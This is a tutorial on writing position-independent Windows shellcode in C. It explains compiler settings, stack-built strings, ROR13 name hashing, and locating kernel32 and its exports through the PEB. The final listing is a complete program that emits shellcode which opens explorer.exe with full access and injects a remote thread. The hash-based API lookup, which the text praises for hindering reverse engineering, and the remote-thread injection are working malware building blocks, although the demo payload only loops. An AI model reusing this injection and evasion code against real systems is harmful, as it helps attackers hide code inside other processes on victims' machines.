Writing Shellcode with a C Compiler

Background

There comes a time when some programmers need to write a block of code that can run in a position-independent fashion and be written somewhere (across the network, into another process, etc.) as a single buffer of data. This type of code is called shellcode, a name it owes to its origins in software exploitation, where an attacker needs a small chunk of code that can get a shell. Through one nefarious trick or another, the idea is simply to get this chunk of code to execute and do its magic. The code has to stand on its own, and its author doesn’t have the luxury of using modern software development practices to build it.

Assembler is most commonly used to write shellcode. When size is absolutely critical, this is a good choice. Personally, many of my projects need blocks of code that do shellcode-like things and must be injected into other processes. In these cases I don’t really care about size; development efficiency and ease of debugging matter more to me. In the beginning I would write stand-alone assembler (with NASM), take the resulting output file, convert it into a C array and incorporate it into my program. This is the approach taken by most exploit payloads you’ll see on sites such as milw0rm. Eventually I became sick of this and started using inline assembly for most tasks, even though I really missed the full feature set of the NASM assembler. With some experimentation I’ve come up with a workable system for writing this style of shellcode almost entirely in C (it needs only two instructions of inline assembler). The gains in development speed are huge, and there is really no contest when it comes to debugging. I’m no slouch with a machine-level debugger like OllyDbg, but it still pales in comparison to debugging at the C source level with the Visual Studio debugger.

Getting Started

Some special care has to be taken with Visual Studio to ensure that it generates code in the specific format that shellcode requires. Here is the list of settings, which may change in the future as the compiler changes:

Use Release mode only. Debug mode (on recent compilers at least) outputs functions in reverse order and inserts lots of position-dependent calls.
Disable optimization. The optimizer may remove or rearrange functions it thinks aren’t being used, and we need every one of our functions to stay exactly where we put it.
Disable buffer security checks (/GS-). The stack cookie check added to a function’s prologue and epilogue references a global cookie and a check routine at fixed, position-dependent locations in the binary, so any function compiled with it is not relocatable and is useless as shellcode.

Your First Shellcode

#include <stdio.h>

void shell_code()
{
    for (;;)
        ;
}

void __declspec(naked) END_SHELLCODE(void) {}

int main(int argc, char *argv[])
{
    int sizeofshellcode = (int)((char *)END_SHELLCODE - (char *)shell_code);

    // Show some info about our shellcode buffer
    printf("Shellcode starts at %p and is %d bytes long\n", (void *)shell_code, sizeofshellcode);

    // Now we can test out the shellcode by calling it from C!
    shell_code();

    return 0;
}

So the shellcode in this example is nothing more than an infinite loop, but the important thing to note is the stub function END_SHELLCODE, placed after the shell_code function. With it in place, we can determine the length of the shellcode simply by measuring the distance between the start of shell_code and the start of END_SHELLCODE. The beauty of C here is that we can access the program itself as a buffer, so if we needed to write the shellcode to a file we could make a simple call such as fwrite(shell_code, sizeofshellcode, 1, filehandle);
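Writing the buffer out is an ordinary binary file write. Below is a minimal sketch of such a helper; write_code_buffer and file_size are illustrative names, not part of the original program. The main point it shows is the file mode: on Windows the C runtime’s text mode expands every 0x0A byte into 0x0D 0x0A, which would silently corrupt machine code, so the file must be opened with "wb".

```c
#include <stddef.h>
#include <stdio.h>

/* Write len bytes from buf to path in binary mode ("wb"), so no newline
   translation can alter the bytes. Returns 0 on success, -1 on error. */
static int write_code_buffer(const char *path, const void *buf, size_t len)
{
    FILE *f = fopen(path, "wb");
    if (f == NULL)
        return -1;
    if (len > 0 && fwrite(buf, len, 1, f) != 1) {
        fclose(f);
        return -1;
    }
    return fclose(f) == 0 ? 0 : -1;
}

/* Return the size of the file at path in bytes, or -1 on error. */
static long file_size(const char *path)
{
    FILE *f = fopen(path, "rb");
    long size;

    if (f == NULL)
        return -1;
    if (fseek(f, 0, SEEK_END) != 0) {
        fclose(f);
        return -1;
    }
    size = ftell(f);
    fclose(f);
    return size;
}
```

With the first example, a call would look like write_code_buffer("shellcode.bin", shell_code, sizeofshellcode), assuming your compiler accepts a function pointer where a data pointer is expected (MSVC does, with a cast).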

From within the Visual Studio environment we can also conveniently debug the shellcode by simply calling the shell_code function and using the normal IDE debugging features.

In this first example our shellcode uses only one function, but it is possible to use many. All of your functions must be contiguous, though, and lie between the shell_code function (the beginning) and the END_SHELLCODE marker. This works because calls between functions in the same program compile to relative call instructions: the call instruction says “call the function X bytes from here”. So if we copy both the calling code and the code it calls to some other location (like another process) and keep the distance between them the same, everything links up just fine.
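The arithmetic behind relative calls can be sketched in portable C. This models 32-bit addresses as plain integers and covers only the common x86 form, opcode E8 followed by a 32-bit displacement; call_target and call_displacement are illustrative helper names, not an existing API.

```c
#include <stdint.h>

/* An x86 "call rel32" is 5 bytes: opcode E8 plus a 32-bit displacement. */
#define CALL_REL32_LEN 5

/* Where a call at call_addr with displacement rel32 lands: the CPU adds
   rel32 to the address of the instruction that follows the call. */
static uint32_t call_target(uint32_t call_addr, int32_t rel32)
{
    return (uint32_t)((int64_t)call_addr + CALL_REL32_LEN + rel32);
}

/* The displacement a compiler/linker would encode for a call at call_addr
   that should reach target. */
static int32_t call_displacement(uint32_t call_addr, uint32_t target)
{
    return (int32_t)((int64_t)target - ((int64_t)call_addr + CALL_REL32_LEN));
}
```

For a call at 0x00401010 to a function at 0x00401100 the encoded displacement is 0xEB. Shift both addresses by the same amount and call_target still lands on the callee, which is exactly why the copied shellcode keeps working.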

Using Data in your Shellcode

In traditional C source code, if you need to use a piece of data such as an ASCII string you can simply write it inline without worrying about where the data lives, for example: WinExec("evil.exe", SW_SHOWNORMAL); In this example the string “evil.exe” actually sits at a fixed place within the C program (probably in the .rdata section of the compiled binary). If we copied this code out and injected it into another process it would fail, because the string almost certainly won’t exist at that address in the other process. Traditional assembler shellcode gets at data easily by using the call instruction to obtain a pointer into the code itself, which may have data intermingled. Here is that WinExec call implemented in a shellcode manner with assembler:

push 1              ; uCmdShow = SW_SHOWNORMAL
call end_of_string
db 'evil.exe',0
end_of_string:
call WinExec

In this fragment the call to end_of_string hops over the string “evil.exe” and also leaves a pointer to the string on top of the stack (the call’s “return address”), which is then used as the lpCmdLine argument to WinExec. This clever approach to data is very space efficient, but there is no direct equivalent in C. If you want to write your shellcode in C, I recommend using stack buffers for any strings you need. To make a string that is built dynamically on the stack (and thus easily relocatable) with modern Microsoft compilers, you must do the following:

char mystring[] = {'e','v','i','l','.','e','x','e',0};
WinExec(mystring, SW_SHOWNORMAL);

Notice that I had to declare my string as an explicit array of characters. This is a recent change: with older Microsoft compilers, char mystring[] = "evil.exe"; produced code that builds the string dynamically with a series of mov instructions, whereas now the compiler emits code that simply copies the string from a fixed location in memory onto the stack, which doesn’t work when we need relocatable code. Try both approaches yourself and look at the disassembly they produce (download the IDA Pro freeware edition if you don’t have the real thing). Your disassembly for the array initialization should look something like this before any cleanup:


mov [ebp+mystring], 65h
mov [ebp+mystring+1], 76h
mov [ebp+mystring+2], 69h
mov [ebp+mystring+3], 6Ch
mov [ebp+mystring+4], 2Eh
mov [ebp+mystring+5], 65h
mov [ebp+mystring+6], 78h
mov [ebp+mystring+7], 65h
mov [ebp+mystring+8], 0
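Typing these initializers by hand is tedious and error-prone. A small host-side helper can generate them for you; the sketch below is hypothetical (make_stack_string_initializer is not from the original toolchain) and handles plain ASCII only. Whatever generates the initializer, it is still worth confirming in the disassembly that your compiler emits mov instructions for it.

```c
#include <stdio.h>
#include <string.h>

/* Append text to out (capacity outsz, currently *used chars long).
   Returns 0 on success, -1 if it would not fit. */
static int append_text(char *out, size_t outsz, size_t *used, const char *text)
{
    size_t len = strlen(text);
    if (*used + len + 1 > outsz)
        return -1;
    memcpy(out + *used, text, len + 1);
    *used += len;
    return 0;
}

/* Write an initializer such as {'e','v','i','l',0} for the ASCII string s
   into out. Quote and backslash are escaped; other non-printable bytes are
   not handled by this sketch. Returns 0 on success, -1 if out is too small. */
static int make_stack_string_initializer(const char *s, char *out, size_t outsz)
{
    size_t used = 0;
    char piece[8];

    if (outsz == 0)
        return -1;
    out[0] = '\0';
    if (append_text(out, outsz, &used, "{") != 0)
        return -1;
    for (; *s != '\0'; s++) {
        if (*s == '\'' || *s == '\\')
            snprintf(piece, sizeof piece, "'\\%c',", *s);
        else
            snprintf(piece, sizeof piece, "'%c',", *s);
        if (append_text(out, outsz, &used, piece) != 0)
            return -1;
    }
    return append_text(out, outsz, &used, "0}");   /* NUL terminator */
}
```

Calling it with "evil.exe" produces exactly the initializer used above, {'e','v','i','l','.','e','x','e',0}, ready to paste into a char array declaration.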

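Strings are the main headache when it comes to data. Most everything else works as you’d expect, and you have access to the full set of capabilities offered by C: structs, enums, typedefs and function pointers. Just keep all your data in local variables and you’ll be fine. Still, check the disassembly for other constructs the compiler may back with fixed addresses or library calls, such as floating-point constants, switch statements compiled into jump tables, and large zero-initialized local arrays (which may become a call to memset).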

Using Library Functions (a.k.a. doing anything useful on a system)

I’m keeping this article focused on shellcode in a Windows environment, though the principles above apply to Unix systems as well. Windows shellcode is a bit trickier because we don’t have a consistent, widely published way to perform system calls with just a few lines of assembly the way we do on Unix (with a quick int 80h). To read and write files, communicate across the network and so on, we need the Windows API functions provided by a set of DLLs. These DLLs eventually perform the necessary system calls (through sysenter rather than an interrupt), and the details, such as the system call numbers, change with nearly every Windows release. Shellcoding best practice, and tomes such as The Shellcoder’s Handbook, describe a method for locating DLLs in memory and finding functions as needed. To be portable across Windows versions, your shellcode needs two functions: 1. a function to find Kernel32.dll, and 2. an implementation of GetProcAddress() or a function to find the location of GetProcAddress(). The implementations I provide for both use hashing instead of string comparison, so I’ll take a brief detour to explain hashing and provide hash implementations for your shellcode.

Hashing Functions

Hashing is a very common technique for function lookups in shellcode. The ROR13 hash is the most popular, and it is the one used in The Shellcoder’s Handbook. The idea is that if we are looking for a function named “MyFunction”, then instead of keeping that string in memory and comparing it against every function name we come across, we keep only a small (32-bit) hash value, hash each function name, and compare the hashes. This does not save processor time, but it may save some space in the shellcode and has definite anti-reverse-engineering benefits. I provide both ASCII and Unicode versions of the ROR13 hash below.

DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string)
{
    DWORD hash = 0;

    while (*unicode_string != 0)
    {
        DWORD val = (DWORD)*unicode_string++;
        hash = (hash >> 13) | (hash << 19); // ROR 13
        hash += val;
    }
    return hash;
}

DWORD __stdcall ror13_hash(const char *string)
{
    DWORD hash = 0;

    while (*string) {
        DWORD val = (DWORD) *string++;
        hash = (hash >> 13)|(hash << 19);  // ROR 13
        hash += val;
    }
    return hash;
}
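The hash constants used later (such as 0xEC0E4E8E for LoadLibraryA) have to be computed somewhere. A minimal host-side sketch, assuming a C99 compiler with <stdint.h>, reimplements both hashes with fixed-width types; the host_ names are illustrative. The hash is case-sensitive, and for names made only of ASCII characters the Unicode hash gives the same value as the ASCII one, since every code unit has the same numeric value.

```c
#include <stddef.h>
#include <stdint.h>

/* Rotate a 32-bit value right by 13 bits. */
static uint32_t ror13(uint32_t x)
{
    return (x >> 13) | (x << 19);
}

/* Same rotate-then-add loop as ror13_hash above (identical results for
   ASCII input). */
static uint32_t host_ror13_hash(const char *s)
{
    uint32_t hash = 0;
    while (*s)
        hash = ror13(hash) + (unsigned char)*s++;
    return hash;
}

/* Same loop over 16-bit code units, like unicode_ror13_hash above. */
static uint32_t host_unicode_ror13_hash(const uint16_t *s)
{
    uint32_t hash = 0;
    while (*s)
        hash = ror13(hash) + *s++;
    return hash;
}
```

Printing host_ror13_hash("LoadLibraryA") with printf("0x%08X\n", ...) on the build machine yields the constant to paste into the shellcode.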

Finding DLLs (such as Kernel32)

There are three lists of the DLLs currently loaded in memory: InMemoryOrderModuleList, InInitializationOrderModuleList and InLoadOrderModuleList. They live in the loader data structure (PEB_LDR_DATA) that the Process Environment Block (PEB) points to through its Ldr field. It doesn’t really matter which list your shellcode uses; the code I provide uses InMemoryOrderModuleList. To access the PEB we need two lines of inline assembler, which read the PEB pointer stored at offset 0x30 of the Thread Environment Block (TEB), the structure the FS segment register points to on 32-bit Windows.

PPEB __declspec(naked) get_peb(void)
{
    __asm {
        mov eax, fs:[0x30]
        ret
    }
}

Now that our shellcode can reach the PEB, we can look up DLLs in memory. The only DLL that is ALWAYS in memory in a Windows process is ntdll.dll, but kernel32.dll is much more convenient and is still available in 99.99% of Windows processes (the process must belong to the Win32 subsystem). The implementation below walks the module list and finds the module named kernel32.dll by its Unicode ROR13 hash, which we talked about earlier.

HMODULE __stdcall find_kernel32(void)
{
    return find_module_by_hash(0x8FECD63F);
}

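HMODULE __stdcall find_module_by_hash(DWORD hash)
{
    PPEB peb;
    LIST_ENTRY *list_head;
    LDR_DATA_TABLE_ENTRY *module_ptr;

    peb = get_peb();
    list_head = &peb->Ldr->InMemoryOrderModuleList;

    // Each Flink in this list points at the InMemoryOrderLinks member of an
    // entry, not at the start of the LDR_DATA_TABLE_ENTRY. Casting it anyway
    // shifts every winternl.h field by two pointers, so below, Reserved1[0]
    // reads the next InMemoryOrderLinks.Flink, Reserved2[0] reads DllBase and
    // FullDllName reads the BaseDllName string (e.g. "kernel32.dll").
    module_ptr = (PLDR_DATA_TABLE_ENTRY)list_head->Flink;

    // The list is circular: stop when we are back at the list head, which
    // lives in PEB_LDR_DATA and is not a module entry.
    while ((LIST_ENTRY *)module_ptr != list_head) {
        if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash)
            return (HMODULE)module_ptr->Reserved2[0];
        module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0];
    }

    return NULL;   // not found
}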
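The cast in find_module_by_hash works because each Flink points into the middle of an entry (at its InMemoryOrderLinks field), not at the entry’s start, and because the list head is a bare link inside PEB_LDR_DATA rather than a module. The portable sketch below models that layout with hypothetical stand-in types (list_entry, fake_module and the CONTAINING macro are illustrative, not the real Windows structures) and shows the conventional way to step back from a link to its record, the same idea as the CONTAINING_RECORD macro in the Windows headers.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for LIST_ENTRY: one link of a circular doubly linked list. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Step back from a link field to the start of the record containing it. */
#define CONTAINING(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Hypothetical module record: like LDR_DATA_TABLE_ENTRY, the links for
   different lists sit at different offsets. */
typedef struct fake_module {
    list_entry load_order_links;    /* offset 0 */
    list_entry memory_order_links;  /* offset 2 * sizeof(void *) */
    const char *name;
    uintptr_t base;
} fake_module;

static void list_init(list_entry *head)
{
    head->flink = head;
    head->blink = head;
}

static void list_append(list_entry *head, list_entry *e)
{
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

/* Walk the "memory order" list; the head is not a module, so stop there. */
static fake_module *find_module(list_entry *head, const char *name)
{
    list_entry *e;
    for (e = head->flink; e != head; e = e->flink) {
        fake_module *m = CONTAINING(e, fake_module, memory_order_links);
        if (strcmp(m->name, name) == 0)
            return m;
    }
    return NULL;
}
```

The raw link pointer sits two pointers past the start of its record, which is the same two-pointer shift the direct cast in find_module_by_hash relies on.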

The find_module_by_hash function above lets you find any loaded DLL given a hash of its name. If you need to load a new DLL that might not be in memory yet, though, you’ll need the LoadLibrary function from Kernel32.dll. To find LoadLibrary we need an implementation of GetProcAddress. The implementation below looks up a function within a loaded DLL based on a hash of the function name.

FARPROC __stdcall find_function(HMODULE module, DWORD hash)
{
    IMAGE_DOS_HEADER *dos_header;
    IMAGE_NT_HEADERS *nt_headers;
    IMAGE_EXPORT_DIRECTORY *export_dir;
    DWORD *names, *funcs;
    WORD *nameords;
    DWORD i;   // unsigned, to match NumberOfNames

    dos_header = (IMAGE_DOS_HEADER *)module;
    nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew);
    export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    names = (DWORD *)((char *)module + export_dir->AddressOfNames);
    funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions);
    nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals);

    for (i = 0; i < export_dir->NumberOfNames; i++)
    {
        char *string = (char *)module + names[i];
        if (hash == ror13_hash(string))
        {
            WORD nameord = nameords[i];
            DWORD funcrva = funcs[nameord];
            return (FARPROC)((char *)module + funcrva);
        }
    }

    return NULL;
}
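The three-step indirection in find_function (name index, then name ordinal, then function RVA) is easy to get wrong, and it can be exercised on the host with a synthetic export table. The sketch below is a simplified model under stated assumptions: struct fake_image and its fields are hypothetical and leave out the rest of IMAGE_EXPORT_DIRECTORY. Note also that find_function as written does not handle forwarded exports, whose function RVA points at a “DLL.Function” string inside the export directory instead of at code.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same rotate-right-13-then-add hash as ror13_hash above. */
static uint32_t sketch_ror13_hash(const char *s)
{
    uint32_t h = 0;
    while (*s)
        h = ((h >> 13) | (h << 19)) + (unsigned char)*s++;
    return h;
}

/* Hypothetical stand-in for a mapped DLL: the export arrays and name strings
   live in one struct, so offsetof() gives RVAs relative to its start. */
struct fake_image {
    uint32_t address_of_names[2];         /* RVAs of sorted name strings */
    uint16_t address_of_name_ordinals[2]; /* indexes into address_of_functions */
    uint32_t address_of_functions[3];     /* RVAs of exported code */
    char name0[16];
    char name1[16];
};

static void build_fake_image(struct fake_image *img)
{
    memset(img, 0, sizeof *img);
    strcpy(img->name0, "GetTickCount");
    strcpy(img->name1, "LoadLibraryA");
    img->address_of_names[0] = (uint32_t)offsetof(struct fake_image, name0);
    img->address_of_names[1] = (uint32_t)offsetof(struct fake_image, name1);
    img->address_of_name_ordinals[0] = 2;   /* deliberately out of order */
    img->address_of_name_ordinals[1] = 0;
    img->address_of_functions[0] = 0x1000;
    img->address_of_functions[1] = 0x2000;  /* exported by ordinal only */
    img->address_of_functions[2] = 0x3000;
}

/* name index -> name ordinal -> function RVA, as in find_function.
   Returns 0 when no name matches the hash. */
static uint32_t lookup_rva_by_hash(const struct fake_image *img,
                                   uint32_t number_of_names, uint32_t hash)
{
    const unsigned char *base = (const unsigned char *)img;
    const uint32_t *names = (const uint32_t *)(base + offsetof(struct fake_image, address_of_names));
    const uint16_t *ordinals = (const uint16_t *)(base + offsetof(struct fake_image, address_of_name_ordinals));
    const uint32_t *funcs = (const uint32_t *)(base + offsetof(struct fake_image, address_of_functions));
    uint32_t i;

    for (i = 0; i < number_of_names; i++) {
        const char *name = (const char *)(base + names[i]);
        if (sketch_ror13_hash(name) == hash)
            return funcs[ordinals[i]];
    }
    return 0;
}
```

Here LoadLibraryA is the second name but maps through ordinal 0 to RVA 0x1000, while GetTickCount maps through ordinal 2 to 0x3000, so indexing funcs by the name index instead of the name ordinal would visibly fail.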

Now we can look up functions like this:


HMODULE kern32 = find_kernel32();
FARPROC loadlibrarya = find_function(kern32, 0xEC0E4E8E);   // the hash of LoadLibraryA
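The program in the next section calls FARPROC values directly with arguments. C accepts that because FARPROC is declared with an empty parameter list, but the compiler then cannot check the arguments or the return type. A safer habit is to cast the looked-up pointer to a typedef with the exact prototype, on Windows for example typedef HMODULE (WINAPI *LoadLibraryA_t)(LPCSTR); so that the calling convention is part of the type too. The portable sketch below shows only the pattern; lookup, add_ints and mul_ints are hypothetical stand-ins for find_function and real API functions.

```c
#include <stddef.h>
#include <string.h>

/* Generic "some function" pointer, playing the role FARPROC plays. */
typedef void (*generic_fn)(void);

/* The exact prototype of the routines we want to call. */
typedef int (*binary_op_fn)(int, int);

static int add_ints(int a, int b) { return a + b; }
static int mul_ints(int a, int b) { return a * b; }

/* Hypothetical stand-in for find_function: maps a name to an untyped
   function pointer, or NULL if the name is unknown. */
static generic_fn lookup(const char *name)
{
    if (strcmp(name, "add") == 0)
        return (generic_fn)add_ints;
    if (strcmp(name, "mul") == 0)
        return (generic_fn)mul_ints;
    return NULL;
}

/* Cast back to the real prototype before calling; calling through a
   mismatched function type is undefined behaviour in C.
   Returns -1 when the name is unknown. */
static int call_binary_op(const char *name, int a, int b)
{
    binary_op_fn fn = (binary_op_fn)lookup(name);
    return fn != NULL ? fn(a, b) : -1;
}
```

Applied to the line above, this would read LoadLibraryA_t loadlibrarya = (LoadLibraryA_t)find_function(kern32, 0xEC0E4E8E); after which loadlibrarya("user32.dll") is type-checked like any normal call.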

The Finished Product

I now present the sum of all this knowledge in a C program that, when executed, creates a file named “shellcode.bin” containing the shellcode. The shellcode injects a thread into the explorer.exe process, and that thread does nothing but spin in an infinite loop. Note that the injected thread will keep one CPU core fully busy until explorer.exe is terminated.

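#include <stdio.h>
// Build without UNICODE so that PROCESSENTRY32 is the ANSI structure, which
// matches the char-based strmatch() below.
#undef UNICODE
#undef _UNICODE
#include <Windows.h>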
#include <winternl.h>
#include <wchar.h>
#include <tlhelp32.h>

PPEB get_peb(void);
DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string);
DWORD __stdcall ror13_hash(const char *string);
HMODULE __stdcall find_module_by_hash(DWORD hash);
HMODULE __stdcall find_kernel32(void);
FARPROC __stdcall find_function(HMODULE module, DWORD hash);
HANDLE __stdcall find_process(HMODULE kern32, const char *procname);
VOID __stdcall inject_code(HMODULE kern32, HANDLE hprocess, const char *code, DWORD size);
BOOL __stdcall strmatch(const char *a, const char *b);

void __stdcall shell_code()
{
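    HMODULE kern32;
    HANDLE hProcess;
    char procname[] = {'e','x','p','l','o','r','e','r','.','e','x','e',0};
    char code[] = {(char)0xEB, (char)0xFE};   // jmp $ (jumps to itself forever)

    kern32 = find_kernel32();
    hProcess = find_process(kern32, procname);
    if (hProcess == NULL || hProcess == INVALID_HANDLE_VALUE)
        return;   // explorer.exe not found, or OpenProcess failed
    inject_code(kern32, hProcess, code, sizeof code);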
}

HANDLE __stdcall find_process(HMODULE kern32, const char *procname)
{
    FARPROC createtoolhelp32snapshot = find_function(kern32, 0xE454DFED);
    FARPROC process32first = find_function(kern32, 0x3249BAA7);
    FARPROC process32next = find_function(kern32, 0x4776654A);
    FARPROC openprocess = find_function(kern32, 0xEFE297C0);
    HANDLE hSnapshot;
    PROCESSENTRY32 pe32;

    hSnapshot = (HANDLE)createtoolhelp32snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return INVALID_HANDLE_VALUE;

    pe32.dwSize = sizeof( PROCESSENTRY32 );

    if (!process32first(hSnapshot, &pe32))
        return INVALID_HANDLE_VALUE;

    do
    {
        if (strmatch(pe32.szExeFile, procname))
        {
            return (HANDLE)openprocess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
        }
    } while (process32next(hSnapshot, &pe32));

    return INVALID_HANDLE_VALUE;
}

BOOL __stdcall strmatch(const char *a, const char *b)
{
    while (*a != '\0' && *b != '\0')
    {
        char aA_delta = 'a' - 'A';
        char a_conv = *a >= 'a' && *a <= 'z' ? *a - aA_delta : *a;
        char b_conv = *b >= 'a' && *b <= 'z' ? *b - aA_delta : *b;

        if (a_conv != b_conv)
            return FALSE;
        a++;
        b++;
    }

    if (*b == '\0' && *a == '\0')
        return TRUE;
    else
        return FALSE;
}

VOID __stdcall inject_code(HMODULE kern32, HANDLE hprocess, const char *code, DWORD size)
{
    FARPROC virtualallocex = find_function(kern32, 0x6E1A959C);
    FARPROC writeprocessmemory = find_function(kern32, 0xD83D6AA1);
    FARPROC createremotethread = find_function(kern32, 0x72BD9CDD);
    LPVOID remote_buffer;
    DWORD dwNumBytesWritten;

    remote_buffer = (LPVOID)virtualallocex(hprocess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (remote_buffer == NULL)
        return;

    if (!writeprocessmemory(hprocess, remote_buffer, code, size, &dwNumBytesWritten))
        return;

    createremotethread(hprocess, NULL, 0, remote_buffer, NULL, 0, NULL);
}

HMODULE __stdcall find_kernel32(void)
{
    return find_module_by_hash(0x8FECD63F);
}

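HMODULE __stdcall find_module_by_hash(DWORD hash)
{
    PPEB peb;
    LIST_ENTRY *list_head;
    LDR_DATA_TABLE_ENTRY *module_ptr;

    peb = get_peb();
    list_head = &peb->Ldr->InMemoryOrderModuleList;

    // Each Flink in this list points at the InMemoryOrderLinks member of an
    // entry, not at the start of the LDR_DATA_TABLE_ENTRY. Casting it anyway
    // shifts every winternl.h field by two pointers, so below, Reserved1[0]
    // reads the next InMemoryOrderLinks.Flink, Reserved2[0] reads DllBase and
    // FullDllName reads the BaseDllName string (e.g. "kernel32.dll").
    module_ptr = (PLDR_DATA_TABLE_ENTRY)list_head->Flink;

    // The list is circular: stop when we are back at the list head, which
    // lives in PEB_LDR_DATA and is not a module entry.
    while ((LIST_ENTRY *)module_ptr != list_head) {
        if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash)
            return (HMODULE)module_ptr->Reserved2[0];
        module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0];
    }

    return NULL;   // not found
}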

PPEB __declspec(naked) get_peb(void)
{
    __asm {
        mov eax, fs:[0x30]
        ret
    }
}

DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string)
{
    DWORD hash = 0;

    while (*unicode_string != 0)
    {
        DWORD val = (DWORD)*unicode_string++;
        hash = (hash >> 13) | (hash << 19); // ROR 13
        hash += val;
    }
    return hash;
}

DWORD __stdcall ror13_hash(const char *string)
{
    DWORD hash = 0;

    while (*string) {
        DWORD val = (DWORD) *string++;
        hash = (hash >> 13)|(hash << 19);  // ROR 13
        hash += val;
    }
    return hash;
}

FARPROC __stdcall find_function(HMODULE module, DWORD hash)
{
    IMAGE_DOS_HEADER *dos_header;
    IMAGE_NT_HEADERS *nt_headers;
    IMAGE_EXPORT_DIRECTORY *export_dir;
    DWORD *names, *funcs;
    WORD *nameords;
    DWORD i;   // unsigned, to match NumberOfNames

    dos_header = (IMAGE_DOS_HEADER *)module;
    nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew);
    export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    names = (DWORD *)((char *)module + export_dir->AddressOfNames);
    funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions);
    nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals);

    for (i = 0; i < export_dir->NumberOfNames; i++)
    {
        char *string = (char *)module + names[i];
        if (hash == ror13_hash(string))
        {
            WORD nameord = nameords[i];
            DWORD funcrva = funcs[nameord];
            return (FARPROC)((char *)module + funcrva);
        }
    }

    return NULL;
}

void __declspec(naked) END_SHELLCODE(void) {}

int main(int argc, char *argv[])
{
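    // "wb": binary mode, so the CRT does not turn 0x0A bytes into 0x0D 0x0A
    FILE *output_file = fopen("shellcode.bin", "wb");
    if (output_file == NULL)
        return 1;
    fwrite(shell_code, (char *)END_SHELLCODE - (char *)shell_code, 1, output_file);
    fclose(output_file);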

    return 0;
}
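Because the helper routines are ordinary C, the ones that don’t touch Windows APIs can be unit-tested natively before anything is injected. As a sketch, here is strmatch copied into portable C (strmatch_host is an illustrative name, and BOOL becomes int): a case-insensitive comparison of two NUL-terminated ASCII strings.

```c
/* Portable copy of strmatch: returns 1 if a and b are equal ignoring ASCII
   letter case, 0 otherwise. */
static int strmatch_host(const char *a, const char *b)
{
    while (*a != '\0' && *b != '\0') {
        /* Fold lowercase ASCII letters to uppercase before comparing. */
        char a_conv = (*a >= 'a' && *a <= 'z') ? (char)(*a - ('a' - 'A')) : *a;
        char b_conv = (*b >= 'a' && *b <= 'z') ? (char)(*b - ('a' - 'A')) : *b;

        if (a_conv != b_conv)
            return 0;
        a++;
        b++;
    }
    /* Equal only if both strings ended at the same position. */
    return *a == '\0' && *b == '\0';
}
```

The same approach works for ror13_hash and the other pure helpers: test them natively, then build the shellcode.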